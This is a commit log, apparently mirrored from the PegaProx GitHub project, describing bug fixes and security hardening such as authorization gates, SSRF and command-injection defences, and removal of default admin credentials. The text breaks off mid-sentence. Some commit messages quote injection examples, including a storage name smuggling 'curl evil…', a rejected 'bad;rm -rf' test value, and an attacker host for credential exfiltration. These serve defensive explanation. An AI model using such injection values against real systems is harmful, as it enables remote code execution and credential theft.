mirror of
https://github.com/PegaProx/project-pegaprox.git
synced 2026-08-12 15:27:47 +08:00
* docs(readme): add Plugins link to nav (plugins.pegaprox.com) * fix(xcrepl): race condition (#455) + identity preservation (#456) #455 (race condition): - Scheduler now tracks in-flight job IDs (set + lock in cross_cluster_replication.py) - Skip the tick when previous run still executing — was killing it via "stale replica" cleanup - Manual trigger endpoint returns 409 Conflict instead of spawning a duplicate thread - Thread wrapper releases the slot on completion (or failure) #456 (identity preservation): - Capture source hostname (LXC) / name (QEMU) + per-NIC MAC BEFORE the clone overwrites them — was leaking the temp xcrepl-{vmid}-tmp label to the replica - Restore both on the target after remote-migrate completes - MAC swap preserves bridge / VLAN-tag / rate / firewall tokens — only the MAC token is replaced, everything else inherits from migration - Supports LXC (hwaddr=) and QEMU (virtio= / e1000= / vmxnet3 / etc.) NIC formats - Best-effort — replication doesn't fail if identity restore trips - Architectural-question (vzdump + pct restore --unique 0) parked for later discussion — surgical fix unblocks DR users today * fix(#413): xcrepl safety gate — never delete unrelated VMs on target Reported by @blackshocks. Earlier xcrepl flow deleted any VM on the target that happened to share the source VMID, on the assumption that the VMID collision had to be a previous run of this same job. Real-world scenario: freshly paired clusters where the target already held an unrelated VM at the matching VMID. The delete destroyed user data. Replicas are now tagged on successful migration with two markers: - `pegaprox-replica` (general) - `xcrepl-job-<job_id>` (job-specific) The safety gate before the delete checks for the job-specific tag and refuses to proceed if it's missing — so an unrelated VM at the matching VMID stays put and the run errors out cleanly with an actionable message telling the operator how to recover (tag the stranded replica manually or pick a different target VMID). Cross-job protection: two unrelated xcrepl jobs colliding on the same target VMID can't nuke each other's replicas, the job-specific tag has to match. Existing replicas from pre-v0.9.12 runs are NOT tagged — operators either tag them manually (error message tells them how) or accept one failed run + manual cleanup before the new run creates a fresh, tagged replica. Verified against real PegaProx instance + real LXC 107 (untagged) + synthetic configs covering all 6 gate paths. * fix(#451): login input text invisible in Modern UI corporateLight theme Reported by @thefiredragon. Modern UI's `corporateLight` theme sets `body.light-theme` while Corporate Layout's light mode sets `data-corp-theme="light"` — two separate gating attributes. The existing text-white override (line 1184) only catches the corp-layout path, so the Modern UI's near-white (#fafafa) background was rendering the white-text login inputs as invisible typed text. Surgical fix: add `body.light-theme input.text-white` + `body.light-theme textarea.text-white` overrides so input/textarea text becomes dark-grey on the light bg. Scoped to input/textarea only so the orange submit-button's intentional `text-white` stays white. Verified by curl-ing the served `/` from local PegaProx — rule lands in the rendered HTML, single selector count. Browser hard-reload picks it up immediately (CSS-only, no server restart needed). * fix(#438): v2p sshfs+drive_mirror live-pivot wasn't updating persistent config Reported by @crcro. Three rounds of support-bundles eventually pinned this: In `_do_sshfs_boot_migration` (v2p.py around line 4977), the `drive_mirror -n` live-pivot updates QEMU's runtime view of the disk to the local target but does NOT update the persistent VM config (`/etc/pve/qemu-server/<vmid>.conf`). The attach-disks block (`qm set --scsi0=<vol_id>`, boot order, etc.) was gated behind `if not mirror_success:` — so when the live-pivot DID succeed, none of the persistent config update ran. Symptom: VM works post-migration as long as QEMU stays running, then any reboot finds no disk in config and won't boot. The .raw / .qcow2 files end up orphaned on storage with no VM referencing them. Reporter's bundle (post-completion run, 2026-05-27) showed the full trace: [V2P:0911ff8e] === ALL DISKS MIGRATED TO LOCAL STORAGE (live pivot) === [V2P:0911ff8e] Configuring VM with local disks... ... Final VM config: agent: enabled=1 bios: seabios [... 14 more lines ...] sockets: 1 vga: vmware # ← no scsi0 / virtio0 / boot anywhere Fix: add the persistent-config update inside the mirror_success branch too. Cleans stale args/boot/unused/old-scsi sshfs references, then writes `scsi0=<local-vol-id>` for each migrated disk and sets boot order. VM keeps running off the in-memory pivoted disk, but the config now also reflects it so reboots survive. EFI / sector-size / VM-start steps stay only in the not-mirror-success path since those are creation-time concerns that were already handled at VM creation in the mirror-success flow. E2E verify limitation: no vSphere source available in the local dev env, so this is code-review + static-check + log-flow-trace verified, not a live re-run of a v2p migration. Next migration on @crcro's side validates. * feat(audit): emit terminal-phase events for migration + replication paths v0.9.12-prep. Discovered while debugging #438 + #413 across three days of support-bundle round-trips: vmware/xhm/xcrepl async paths only audit the .started event, never .completed/.failed. That forces every silent-failure investigation into log archaeology with the journalctl-permission-block dance each time, instead of just reading the audit log. Three central hook-points cover ~150 individual exit points: - V2PMigrationTask.set_phase (v2p.py:138) - XHMigrationTask.set_phase (xhm.py:178) - _update_repl_status (vms.py:_update_repl_status) Each now emits a terminal audit event on `completed` or `failed` with the relevant identity (VM name + target VMID for v2p, direction + source/target cluster+node for xhm, job_id for xcrepl) and the failure reason on `failed`. All wrapped in try/except so a broken audit write can't tank the task. Audit-action namespace: - vmware.migration.{completed,failed} ← matches existing .started - xhm.migration.{completed,failed} - replication.{completed,failed} ← matches existing .triggered E2E verified against running pegaprox: instantiated V2PMigrationTask in a python process, called set_phase('failed', 'unit-test simulated error'), confirmed audit_log row landed in DB with the right action + detail. Test entry then deleted. Next #438 bundle should show the failure-reason in audit_log directly. Same for #413 once the failover thread hits a terminal phase. Saves the log-window-vs-audit-event timing game on every future bundle. * fix(security): Added cluster-scoped authorization validation to prevent unauthorized cluster deletion via check_cluster_access() in the DELETE endpoint. (#459) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Added VM-specific authorization validation to prevent unauthorized disk manipulation during storage migration operations. (#460) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed cross-tenant RBAC bypass vulnerability in custom role CRUD operations by adding tenant-scoped authorization validation. (#470) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed authorization bypass vulnerability by validating scheduled task actions to prevent privilege escalation from vm.start to node.update permissions. (#461) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed heredoc terminator injection vulnerabilities in hosts, DNS, and certificate management by using UUID-based dynamic delimiters instead of fixed heredoc terminators. (#468) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Added cluster-scoped authorization validation to HA management endpoints to prevent unauthorized access to clusters outside user scope. (#467) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Added object-level authorization to PBS API endpoints to enforce cluster-based access control and prevent unauthorized cross-server operations. (#476) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Added cluster-level access control checks to all 15 plan-specific site recovery API endpoints to enforce authorization for both source and target clusters. (#474) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed authorization bypass vulnerability in VMware VM operations by adding VM-level access control checks across all destructive endpoints. (#478) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Added cluster-level and VM-level access control validation to cross-hypervisor migration planning and execution endpoints to prevent unauthorized VM migrations. (#463) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed unauthorized console ticket minting vulnerability by validating VM existence on target vCenter before issuing credentials. (#462) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed Server-Side Request Forgery (SSRF) vulnerability by implementing PBS host validation and allowlisting in pegaprox/core/pbs.py and pegaprox/api/pbs.py. (#475) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): Fixed CSV formula injection vulnerability in audit log exports by sanitizing fields to neutralize spreadsheet formula-triggering characters. (#483) Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com> * fix(security): command injection prevention via storage-name validation + shlex.quote (#481 port) Manual port of closed Aikido autofix #481 (closed-superseded by mistake during the batch-merge sweep — re-review showed it had unique, critical coverage that no other PR replaced). What was actually exposed: `storage` / `target_storage` params land in `pvesm path` / `pvesm alloc` / `pvesm status` shell commands on the PVE node across 7+ call sites. A user with cluster.config + storage-list access (e.g. storage-balancer role) could craft a storage name like `local-lvm;curl evil…` and execute arbitrary shell on the node — straight RCE class. Defence in two layers: 1. New `validate_storage_name()` helper in utils/sanitization.py — regex-locks to `^[a-zA-Z0-9][a-zA-Z0-9_\-\.]{0,99}$`. Called at the api boundary in `iso_sync_trigger`, `start_vmware_migration`, `xhm_start` before the request ever reaches the worker thread. 2. `shlex.quote()` wraps at every pvesm shell-cmd construction site (defence-in-depth, also catches names that bypassed the api gate via DB direct-write / migration-from-pre-fix-saved-state): - core/manager.py:11280 `pvesm path {storage}:...` - core/v2p.py:656 `pvesm path {target_storage}:1` - core/v2p.py:3277 `pvesm alloc {target_storage}` - core/v2p.py:5434 `pvesm status --storage {target_storage}` - core/xhm.py:717,1811,1861 three `pvesm alloc {target_storage}` cmds - core/v2p.py:1681 already had shlex.quote (kept) Added `import shlex` to xhm.py (was missing). Smoke-tested: imports OK, validate_storage_name accepts legit storage names (local-lvm, tgt01-nfs-hdd, good.storage_1) and rejects injection attempts (`bad;rm -rf`, empty). * fix(security): credential-exfil guard on PBS + VMware host changes (#469 port) Manual port of closed Aikido autofix #469 (closed-superseded by mistake during the batch sweep — re-review showed it addresses a different vuln class than #476 which I cited; ported manually). Vulnerability: when updating a PBS or VMware server entry, the UI lets you keep the saved credentials by sending password/api_token_secret/ssh_key as `********`. PegaProx replaces the masked value with the real stored credential and then calls `mgr.connect()`. If the user ALSO changed the host/port in the same edit, that real credential gets sent to the new host — potentially attacker-controlled (social-engineering-driven cred-exfil; admin gets tricked into pointing the server at evil-server.example). Fix: detect `host_changed AND credentials_preserved` at the same time → set the manager to `connected=False` with a clear `last_error` instead of auto-connecting. Operator must explicitly use Test Connection after verifying the new host. The non-suspicious code paths (host unchanged, OR fresh credentials supplied) keep auto-connecting as before. Both update endpoints get the guard: - `update_pbs_server` (api/pbs.py) - `update_vmware_server` (api/vmware.py) vmware.py was missing `import logging` for the warning line — added. * fix(security): VM-level ACL gate on site-recovery add_plan_vm (#477 port) Manual port of closed Aikido autofix #477 (closed-superseded by mistake — re-review showed it had VM-level granular coverage that #474 did not). #474 (already merged) added cluster-level `check_cluster_access` on all 15 plan endpoints, which is the necessary baseline. But cluster-level access alone is not sufficient on `add_plan_vm`: a user with cluster-view permission but no ACL for a specific VM could otherwise add that VM to a recovery plan, then trigger a Test Failover or Planned Failover and act on a VM they shouldn't touch. The cluster-gate would pass each time because the plan IS on a cluster the user can see. Fix: in add_plan_vm, after the cluster-access gate, also check `user_can_access_vm(user, plan['source_cluster'], vmid, 'vm.view', vm_type)`. Returns 403 if denied. The other plan endpoints (delete_plan_vm, etc.) don't need this — they operate on already-added rows that went through this gate. * fix(security): cluster-scoped auth on PBS backup-verification endpoints (#465 port) Manual port of closed Aikido autofix #465 (closed-superseded by mistake — #476 which I cited covered the `/api/pbs/<pbs_id>/*` endpoints via `check_pbs_access` but did NOT touch the `/api/clusters/<cluster_id>/backup-verify*` endpoints which use a completely different auth-key. They went un-protected after that merge — the gap was unintentional on my side, not Aikido's). Three endpoints get a `check_cluster_access(cluster_id)` gate after the existing `@require_auth(perms=['vm.backup'])` decorator: - `POST /api/clusters/<cluster_id>/backup-verify` start_backup_verification - `GET /api/clusters/<cluster_id>/backup-verify/<task>` get_backup_verification_status - `GET /api/clusters/<cluster_id>/backup-verify/history` get_backup_verification_history Pattern matches the existing cluster-access checks across the codebase. No behavioral change for users with proper cluster ACL; 403 for cross-cluster attempts. * fix(#484): preserve maintenance flag on offline nodes + SSE heartbeat every tick Two bugs reported in #484, both surface when a node in HA maintenance gets rebooted: * manager.get_node_status() offline branch — when status_data is None (node mid-reboot, or circuit breaker open) the per-node dict was built without 'maintenance_mode'/'maintenance_task'/'maintenance_acknowledged'. Sidebar reads metrics.maintenance_mode → undefined → renders '(Offline)' with no maintenance indicator, even though nodes_in_maintenance still has the entry and PVE still has the HA flag set. Same fix applied to the ha_node_status fallback below it (covers full /nodes drop-out). * broadcast loop — heartbeat was gated on `loop_count % 5 == 0`. With a dead node the per-cluster fan-out walls on the 8s thread-join cap each cycle, so heartbeat drifts out to ~40s between beats. Frontend's wedge threshold is 30s → SSE flapping in reconnect loop. Send heartbeat every iteration instead, one tiny message per second is nothing. Verified locally with the dev instance + an in-process probe that hits the offline branch directly. Customer should retest the reboot path on Testing build. * fix(#413): SR background task no longer crashes on broadcast_sse + tolerate PVE 9.x SDN list payload Two issues surfaced in @blackshocks's journalctl bundle: * `[SR] Background task crashed for plan ...: broadcast_sse() missing 1 required positional argument: 'data'` — `_broadcast_progress()` was invoking `broadcast_sse({...})` with a single dict, but the helper signature is `(update_type, data, cluster_id=None)`. Every progress emit in the failover path therefore killed the worker, which is why Test/Planned/Emergency Failover all show as "running" forever in the UI without an outcome event landing. Split the call into the proper `('site_recovery', {...})` form. Same broken pattern was also in `core/xcpng.py:1673,1680` (XCP-NG task-poll loop) — fixed alongside. * `SDN availability check failed: 'list' object has no attribute 'get'` — PVE 9.x returns `/cluster/sdn` as a list of available SDN endpoints (zones, vnets, ipams, …). Older clusters returned a dict carrying a digest. The code unconditionally called `.get('digest')` on it. Added an isinstance guard so the digest is read only when PVE actually exposes a dict; list payloads are accepted silently. Reported by @blackshocks via #413 debug bundle. Verified by isolated REPL probe: `_broadcast_progress('test', 'msg', 42)` runs clean post-fix where it previously raised TypeError. SDN guard is a defensive isinstance check, no live trigger needed. * fix(#413): Proxmox-target SR test failover couldn't find any VM (missing get_vms shim) After the broadcast_sse signature fix this morning (fc77cd5) the SR worker no longer crashes — so the test failover actually runs to completion. @blackshocks's screenshot is now hitting the next layer: "VM not found on target" for every VM in the plan. Root cause: `execute_test_failover` / `_migrate_vm` in `pegaprox/background/site_recovery.py` resolve VMs on the target via `mgr.get_vms(node_name) if hasattr(mgr, 'get_vms') else []`. The method exists on `vmware.py` / `xcpng.py` / `esxi_cluster.py` but not on the main Proxmox manager — that one exposes `get_vm_resources()` instead. So for a Proxmox→Proxmox plan the `hasattr` check returned False and the lookup silently fell back to an empty list, producing "VM not found on target" for every VM, every time. Fix: add a uniform `get_vms(node=None)` shim on `PegaProxManager` that proxies to `get_vm_resources()` and optionally filters to one node. Same list shape as the other managers; no SR-side changes required. Reported by @blackshocks via #413 (post-fix retest). Verified via isolated REPL probe — FakeMgr backed by the existing SR detection loop now resolves VMIDs by node correctly. * fix(#413): SR detection — target_vmid awareness + null-tgt guard + sweep logging @blackshocks's bundle (20260528_113247) shows the test failover ran to completion after a9c0045 but still reported "VM not found on target". The recent_tasks confirm xcrepl had just rebuilt VM 103 on the target node ~28s before the SR test fired, so the lookup *should* have hit — but with zero log output from the SR detection sweep we can't tell from the bundle whether get_node_status() came back empty, whether the get_vms shim returned an empty list, or whether the vmid match itself failed. Symptom only, no signal. Three changes to close that gap: * Honour `site_recovery_vms.target_vmid` when set (column exists in the schema but was never read). Falls back to the source vmid for the common case where PVE qmigrate / our xcrepl preserve the ID. * Guard against `tgt_mgr is None` up front. Was relying on the outer `except Exception` catching the AttributeError, which masked the cluster-disconnected case behind a generic "VM not found". * `logger.info` the sweep at three points: which VMID we're looking for and which nodes we'll probe, per-node VM list count + vmids, and the miss line if detection ends empty. Next bundle should tell us in one glance what PegaProx actually saw. Reported by @blackshocks via #413 (third bundle). No E2E here — restart denied + no SR plan configured in dev env. The logging additions are pure observability, no behaviour change for the happy path; target_vmid fallback only kicks in when the column is populated (currently never via UI/API). * fix(security): aikido findings — SSL outlier + docker.yml job-scoped perms Two real fixable items from the latest Aikido scan (aikido_issues(3).csv, 2026-05-27 batch). Other findings triaged but not changed: * `pegaprox/core/manager.py:7932` was the lone `self.session.post(..., verify=False)` call in the file — every other PVE-API call routes through `_create_session()` which already honours per-cluster `self._ssl_verify`. For the default self-signed-PVE-cert user (`_ssl_verify=False`, set on init) behaviour is identical — the helper still produces `session.verify=False`. The only behaviour change is for operators who explicitly opted into `ssl_verification=True` on a cluster (i.e. they pinned a custom CA) — that one outlier call was the only place still bypassing their choice. REPL-probe verified both directions resolve to the expected verify value. * `.github/workflows/docker.yml:14` had `packages: write` at the workflow top-level so any future job we add silently inherits the GHCR write capability. Moved to job-scoped `permissions:` on `build-and-push` so the cap is granted only to the job that actually pushes. Triaged-no-change (false positives or out-of-scope): - `plugins/status_page/status.html:299` — the setHTMLSafe() wrapper uses a *detached* `<template>.innerHTML` then `_stripDangerousNodes()` before adopting via replaceChildren. Aikido pattern-matched innerHTML; the surrounding sanitiser is the documented defence-in-depth shape. - `web/index.html:{1618,3758,21125}` and the five `-----BEGIN ... KEY-----` hits — every match is a textarea **placeholder** showing users what format to paste their key/cert in. Decoded the suspicious base64 on line 4979: `b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAA=` is literally just the OpenSSH magic header + "none" cipher field, zero key material. - `pegaprox/core/manager.py:{5527,5797,5864,5925,5941}` path-traversal — paths are `os.path.join(heartbeat_dir, f'<prefix>_{node}')` where node comes from PVE's `/api2/json/nodes`, server-controlled. Compromise of PVE makes path traversal of HA log files the least of our worries. Could add a `validate_hostname()` gate as defence-in-depth — left as a Nico-decision since it's 5 callsites with no demonstrated threat. - `ssl/acme_account.key` — file is `.gitignore`d (`ssl/*.key` rule) and `pegaprox/core/acme.py:_load_or_create_account_key` auto-generates a fresh key on install. But the file WAS committed in `f8c12d5` (v0.9.4 release Mar 2026), so the key is still in git history. Repo-history scrub on main is a force-push-class operation — flagged for Nico. Verified via isolated REPL probe of `_create_session()` for both `_ssl_verify` modes. The docker.yml change is metadata-only, no functional impact on PegaProx itself. * fix(security): kill first-run hardcoded-creds takeover — setup wizard replaces default pegaprox/admin Aikido AI-pentest finding (real, not a false positive). On every fresh install `load_users()` auto-bootstrapped `pegaprox` / `admin` with ROLE_ADMIN before the operator even saw the UI. Any network attacker who could reach the port before setup-completion could log in with the publicly-documented credentials, and the `force_password_change=True` flag was advisory-only — the session was issued anyway and every ROLE_ADMIN-gated route accepted it. First-run remote admin takeover. Replaces the auto-bootstrap with an explicit setup wizard: * `utils/auth.py` - `load_users()` no longer creates a default admin when none exists. Returns empty dict for uninitialised installs. Callers must check `is_initialized()` separately. - New `is_initialized()` — returns True if `ADMIN_INITIALIZED_FILE` exists OR users are already in the DB (handles upgrade from pre-setup-wizard builds). - New `backfill_initialized_marker()` — stamps the marker on startup for pre-existing users so upgrade is transparent. - `create_default_users()` removed. New `create_initial_admin( username, password, display_name, email)` shapes the dict from setup-wizard input. * `api/auth.py` - `/api/auth/login`: returns `503 NOT_INITIALIZED` before any credential check when setup hasn't run. No more "is the default password set?" guessing for attackers. - New `/api/auth/setup` (unauth, since there is no session yet): accepts the operator's chosen username + password + optional display_name + email, validates the password policy, refuses the reserved name `pegaprox`, creates the first admin, marks the install as initialised. Replay returns `409 ALREADY_INITIALIZED`. Even if the marker file is deleted on-disk, the DB-second-opinion inside `is_initialized()` prevents a hijacker from racing setup against the existing admin's user record. Per-IP rate-limit (5/60s) is hygiene against username/password fuzzing. - `/api/auth/check` now surfaces `initialized: bool` in the 401 body so the frontend knows when to render the wizard. * `app.py` - Removed the "DEFAULT LOGIN CREDENTIALS" startup banner that literally printed `pegaprox/admin` to stdout. - Calls `backfill_initialized_marker()` once at startup. - Prints a `FIRST-RUN SETUP REQUIRED` banner only when uninitialised. - `/api/auth/setup` added to the CSRF-exempt list (unauth flow, same as `/api/auth/login`). * Frontend - `contexts.js`: `AuthProvider` reads `initialized` from /auth/check response and exposes a `needsSetup` flag. - `dashboard.js`: render `<SetupWizard />` instead of `<LoginScreen />` when `needsSetup && !user`. - `auth.js`: new `SetupWizard` component — branded landing page, username + password + confirm-password + optional display_name + optional email, client-side validation mirrors server, POSTs to `/api/auth/setup`, success → reload so AuthProvider re-checks. - Frontend rebuilt (`web/index.html`). Migration: Existing installs are untouched. On first boot of this build, `backfill_initialized_marker()` stamps ADMIN_INITIALIZED_FILE if any user exists in the DB, so login keeps working. E2E (Flask test_client + temp config dir, no live server needed): Stage 1 fresh install: is_initialized=False, no users Stage 2 backfill upgrade: marker written for existing users Stage 3 full wipe back to fresh Stage 4 pre-setup login → 503 NOT_INITIALIZED Stage 5 /auth/check pre-setup → initialized=false Stage 6 weak password rejected (policy: 8+ chars, upper/lower/digit) Stage 7 reserved username `pegaprox` rejected Stage 8 setup happy path creates admin + marks initialised Stage 9 replay rejected (409 ALREADY_INITIALIZED) Stage 10 new admin can log in Stage 11 old hardcoded pegaprox/admin no longer works (401) Stage 12 marker-deletion attack blocked by DB second-opinion Plus isolated probe: 6th setup attempt within 60s → 429 * feature: Add DNS-01 challenge support for certificate requests Fixes: #420 Sponsored-by: credativ GmbH <https://credativ.de> * fix: default 15s request timeout to prevent dead-cluster UI hangs When a PVE cluster went unreachable mid-session, the UI froze for 30+ seconds per request because ~14 callsites in this module used the authenticated session without an explicit `timeout=` kwarg. requests defaults to None there, so each call would wait out the OS-level TCP keepalive before failing — multiple back-to-back calls compounded into multi-minute freezes (one for each panel the user clicked on a dead cluster). Rather than chase down every `_create_session().get(...)` / `.post(...)` callsite (and the next dozen that will get added) the wrapper in `_create_session()` now injects a default `timeout=15` whenever the caller didn't specify one (or explicitly passed `None`). Callsites that already had `timeout=X` keep winning — only the missing-or-None case gets filled in. Verified against TEST-NET-1 (192.0.2.0/24, RFC 5737 reserved unreachable): - no timeout → ConnectTimeout after 15.0s (was: 120s+) - explicit timeout=2 → 2.0s (caller wins) - explicit timeout=None → 15.0s (safety net still engages) Caveat: `connect_to_proxmox()` still iterates fallback_hosts sequentially, so a fully-dark cluster with 3-4 fallbacks can still freeze the calling thread up to ~60s worst-case. That's a separate follow-up (parallel-probe via gevent.spawn) but the per-request bound already eliminates the runaway-multi-minute case. * feat: cluster worldmap — offline geo-view with zoom + capitals New top-level sidebar entry "World Map" / "Weltkarte" that plots each configured cluster as a dot on an equirectangular world map. Bundled country SVG from Natural Earth (public domain, ~140 KB) so it works without any external tile-server — air-gap installs are fine. Backend ─ Schema migration adds `latitude REAL`, `longitude REAL`, `location_label TEXT` to the clusters table. save_cluster preserves location across unrelated edits (e.g. password rotate) so the dot doesn't disappear off the map every time the operator touches the cluster config. ─ PegaProxConfig picks up the three fields, GET /api/clusters surfaces them. ─ New endpoint `PUT /api/clusters/<id>/location` with strict validation: - lat -90..90, lon -180..180, both-set-or-both-null pattern (`null,null` clears the dot) - rejects bool / dict / list / non-numeric (Python's bool-is-int subclassing trap would silently coerce True → 1.0 otherwise) - location_label sanitised: control chars 0x00-0x1F + 0x7F stripped, capped at 120 chars (prevents audit-log multi-line injection) - per-(IP, cluster) rate-limit: 30 updates / 60s window — defends the HMAC-signed audit log from authenticated spam - writes audit entry `cluster.location_updated`, mirrors into mgr.config so the next /api/clusters GET reflects the change ─ New asset route `GET /assets/<path>` with 1-day Cache-Control. Same send_from_directory pattern as /images/, blocks ../ traversal. Frontend ─ web/src/worldmap.js — three components: - `<WorldMap />` renders the country SVG (theme-aware via CSS vars: dark slate-on-deep-blue / light soft-grey-on-pale-blue), overlays dots with pulsing rings, white halo for contrast on either theme. - `<WorldMapView />` is the fullscreen container with cluster list sidebar and inline `<ClusterLocationEditor />`. ─ Zoom + pan controls (right edge buttons + mouse-wheel anchor-on-cursor + click-drag-pan). Range 1× to 8×, dot/ring sizes shrink with `1/sqrt(scale)` so they don't dominate at high zoom. ─ Country capitals layer — 202 cities from Natural Earth's ne_110m_populated_places_simple (Admin-0 capitals only, sorted by population). Progressive disclosure: dots from 1.2×, labels from 2.5×, toggle button (★) overrides at any zoom. Greedy collision-avoidance walks capitals in pop-desc order and drops labels whose AABB overlaps any already-placed label box (Conakry / Freetown / Monrovia and Brazzaville / Kinshasa used to mush together at moderate zoom). The countries SVG itself was generated from world-atlas@2 with two fixes vs. the naive equirectangular emit: ─ Antimeridian-safe path generation. Russia / Fiji / Kuril Islands used to draw a horizontal line across the entire map when their arcs crossed ±180°; the generator now inserts a Move instead of a Line whenever consecutive points differ by >180° longitude. ─ Fill/stroke set to CSS custom properties (`var(--wm-country-fill)` etc.) so the wrapper div's runtime palette swap actually re-themes the rendered map. i18n 27 worldmap-specific keys added to all 7 supported languages (de / en / fr / es / pt / ko / it). Fallback chain via `t()` keeps unsupported languages on English. Edge cases covered ─ Both SVG layers (countries + dot overlay) now share an explicit `aspectRatio: 2 / 1` on the wrapper + an injected inline style on the bundled SVG. Without this they rendered at different heights (countries: viewBox-aspect, overlay: container-height) and dots floated 70 px above their real country. ─ Empty-state when no cluster has a location set yet, with a CTA to the inline editor. ─ Status-aware dot colour (green=connected, amber=disconnected-but- running, red=offline) plus 8 px status-dot in the sidebar list. Verified via: ─ E2E flask test_client (8 attack-vectors blocked on PUT /location: bool / list / dict types, control-char label injection, NaN, rate limit, etc.) ─ Headless-chromium playwright walk-through (8 view states: default, zoomed, capitals on, editor open, light theme, narrow viewport, cleared-state, restored) ─ Reference markers at known coordinates (NYC, TYO, SYD, NULL=0,0) confirm projection lands on the right continent at all zoom levels. * fix(#413): Planned Failover detects qmigrate aborts mid-flight After yesterday's three SR fixes (broadcast_sse signature, get_vms shim, target_vmid + sweep logging) @blackshocks's Test Failover finally succeeded end-to-end. Planned Failover then exposed the next layer: `_migrate_vm_cross_cluster` treated the result of `src_mgr.remote_migrate_vm(...)` as success-or-failure of the migration itself, when actually it only reflects whether PVE accepted the UPID. The qmigrate task can — and in this case did — abort mid-flight several seconds later, leaving the source VM untouched and the target with the old (pre-replicated) copy still in place. The old code happily marked the failover as `planned_complete: 1/1 VMs`, the UI flipped to a "Failback" button on a migration that never moved anything, and the operator chased a phantom completed state. Concrete from @blackshocks's bundle (`20260529_075654.zip`): recent_tasks audit row: UPID:pv01:...:qmigrate:103 status="migration aborted" audit_log row: site_recovery.planned_complete "Plan 'cl1-cl2' planned completed: 1/1 VMs" Both side by side: PVE says aborted, PegaProx says completed. Fix: after a successful submit (UPID returned), poll the PVE task status via the existing `_wait_for_task` helper from api/vms.py — same pattern xcrepl uses for its qmigrate step. Only declare success if the task ends with `OK` or `WARNINGS`. Otherwise propagate the real exitstatus into the failover event + audit log. Bonus: when the abort detail mentions "already exists", append a hint pointing at Emergency Failover (which calls `_start_replicated_vm` instead of trying to migrate over a pre-existing target VMID). That's the most common cause we can identify from the error string and the common cause for xcrepl-backed plans. Defensive: imports are gated in a try/except so a future split of api.vms wouldn't break SR; UPID-less success paths still treat as OK to avoid making the function stricter than the prior contract on paths we don't fully understand. Reported by @blackshocks via #413. Next layer (semantically: should Planned Failover for an xcrepl-pre-replicated plan auto-switch to emergency-start-replica mode instead of trying to migrate?) is a design question for Nico — parked as follow-up; this commit just stops the false-positive. * fix(security): shlex.quote target_storage in v2p qm-set --efidisk0 calls (#485 manual) Aikido autofix PR #485 flagged that 7 callsites in pegaprox/core/v2p.py embed `task.target_storage` directly into `qm set --efidisk0` shell commands without shell-escaping. API-level validation in api/xhm.py (`validate_storage_name`) already rejects shell metacharacters before they reach this code, so the vulnerability is not exploitable today — but defense-in-depth is cheap and matches the shlex.quote pattern already used elsewhere in the same file for pvesm calls (lines 656, 1681, 3277, 4685, 5434). Did NOT merge the original PR because it only added markdown analysis docs + a `fix_command_injection.py` runner script — the actual source file was never touched. Closing #485 with a pointer to this commit instead. Verification: grep -c "efidisk0 {task.target_storage}:1" pegaprox/core/v2p.py → 0 grep -c "efidisk0 {shlex.quote(task.target_storage)}:1" v2p.py → 7 shlex already imported (line 15) `import pegaprox.core.v2p` → clean * ci: grant actions:write so gha-cache works on the docker build The Aikido-tightening in d257647 moved permissions from workflow-level to job-level. That kept the build-and-push job's effective permissions identical to the original (contents:read + packages:write), so the push to ghcr.io still works — but neither the original workflow nor the tightened version granted `actions:write`, which is what the `cache-from: type=gha` / `cache-to: type=gha,mode=max` lines actually need. Result on prior runs: cache write fails silently with a warning, every release rebuilds linux/amd64 + linux/arm64 from scratch (~5-8 min wall-time hit per release). Adding `actions: write` job-scoped so the cache works and the next release-cut hits the warm cache. Defense-in-depth argument hasn't changed: only `build-and-push` gets the elevated perms, future jobs added to this workflow start fresh from default-deny. No code changes, just CI plumbing. Verifies on next push to main / tag — until then the prior behaviour (working push, slow cache-miss rebuild) is the worst-case fallback. * fix(security): aikido manual-ports — vSphere URL guard + SHA256 update integrity Two Aikido autofix PRs that contained useful security improvements but needed manual-port treatment (their PRs added markdown-only docs or runner-scripts instead of the actual source edit — same anti-pattern as the closed #485). Ports below extract just the substantive fix from each. #489 vmware SSRF guard (manual port of Aikido PR #489) ─ `VMwareManager.api_get(path, ...)` was concatenating `f"{base_url}{path}"` with no defence against a `path` argument that contained `..` traversal or a stray query/fragment. All 15 current callsites pass hardcoded literals or f-strings with internally-looked-up IDs, so SSRF is not exploitable today — but a future refactor that lets external input near `path` would weaponise it. ─ Added `_build_validated_url(path)` helper: * rejects path that doesn't start with `/` * rejects literal `../` and URL-encoded `%2e%2e` traversal * reconstructs URL via urlparse._replace so any embedded query/ fragment in `path` is silently dropped instead of forwarded ─ `api_get()` now routes through the helper and catches the ValueError to surface a clean 'invalid path' error instead of an exception. #473 update-archive integrity (manual port of Aikido PR #473) ─ `perform_pegaprox_update()` previously downloaded the GitHub / mirror tar.gz with zero authenticity verification, then ran `pip install -r requirements.txt` on whatever the archive contained. Attacker who controlled the mirror could plant a malicious requirements.txt and get code-exec on the host the next time an admin clicked Update. ─ Now: compute SHA256 streaming while writing the archive, then verify against `remote_version['archive_sha256']` (a new field in version.json). On mismatch: HTTP 400 + audit `pegaprox.update_failed`. On no-hash: warn + proceed for backwards-compat (existing mirrors without the field keep working). ─ `requirements.txt` added to PROTECTED list so the existing protected-path 